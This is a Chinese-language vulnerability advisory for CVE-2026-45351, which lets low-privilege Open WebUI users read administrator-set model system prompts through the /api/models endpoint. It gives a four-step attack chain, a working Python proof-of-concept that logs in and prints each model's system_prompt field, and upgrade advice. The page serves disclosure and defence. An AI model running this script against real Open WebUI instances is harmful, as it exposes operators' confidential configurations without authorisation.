CVE-2026-45351 CVSS 6.5 中危

CVE-2026-45351 Open WebUI信息泄露漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45351

漏洞类型

信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI在0.8.9版本之前存在信息泄露漏洞。普通用户登录后，应用会自动访问/api/models接口，该接口响应中包含了管理员设置的模型系统提示词。由于权限校验缺失，普通用户可获取敏感配置信息，导致机密性受损。

技术细节

该漏洞是由于Open WebUI对/api/models接口的响应数据缺少敏感信息过滤机制所致。在受影响版本中，当非管理员用户登录并请求模型列表时，服务器端未剥离模型配置中的System Prompt字段。攻击者利用普通账号即可触发该请求，并在返回的JSON数据中读取到管理员预设的系统提示词内容，从而获取可能包含敏感逻辑或内部信息的配置数据。

攻击链分析

STEP 1

获取账号

攻击者注册或获取一个普通用户账号。

STEP 2

登录应用

使用该账号登录Open WebUI平台。

STEP 3

发起请求

发起对/api/models接口的HTTP请求（通常由前端自动触发）。

STEP 4

提取信息

解析响应数据，提取其中的system_prompt字段，获取管理员敏感配置。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: Open WebUI System Prompt Disclosure
# Description: Retrieves system prompts via /api/models endpoint as a normal user.

target = "http://target-ip:8080"
login_url = f"{target}/api/auth/login"
models_url = f"{target}/api/models"

# User credentials
creds = {"username": "lowprivuser", "password": "password"}

# 1. Authenticate
session = requests.Session()
login_resp = session.post(login_url, json=creds)

if login_resp.status_code == 200:
    # 2. Request models list
    models_resp = session.get(models_url)
    
    if models_resp.status_code == 200:
        data = models_resp.json()
        # 3. Extract System Prompts
        for model in data.get('data', []):
            model_id = model.get('id')
            sys_prompt = model.get('system_prompt')
            if sys_prompt:
                print(f"[+] Model: {model_id}")
                print(f"[+] System Prompt: {sys_prompt}")
    else:
        print("Failed to fetch models")
else:
    print("Login failed")

影响范围

Open WebUI < 0.8.9

防御指南

临时缓解措施

建议立即升级至0.8.9或更高版本。如暂时无法升级，应限制普通用户访问权限，并监控API接口调用日志。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表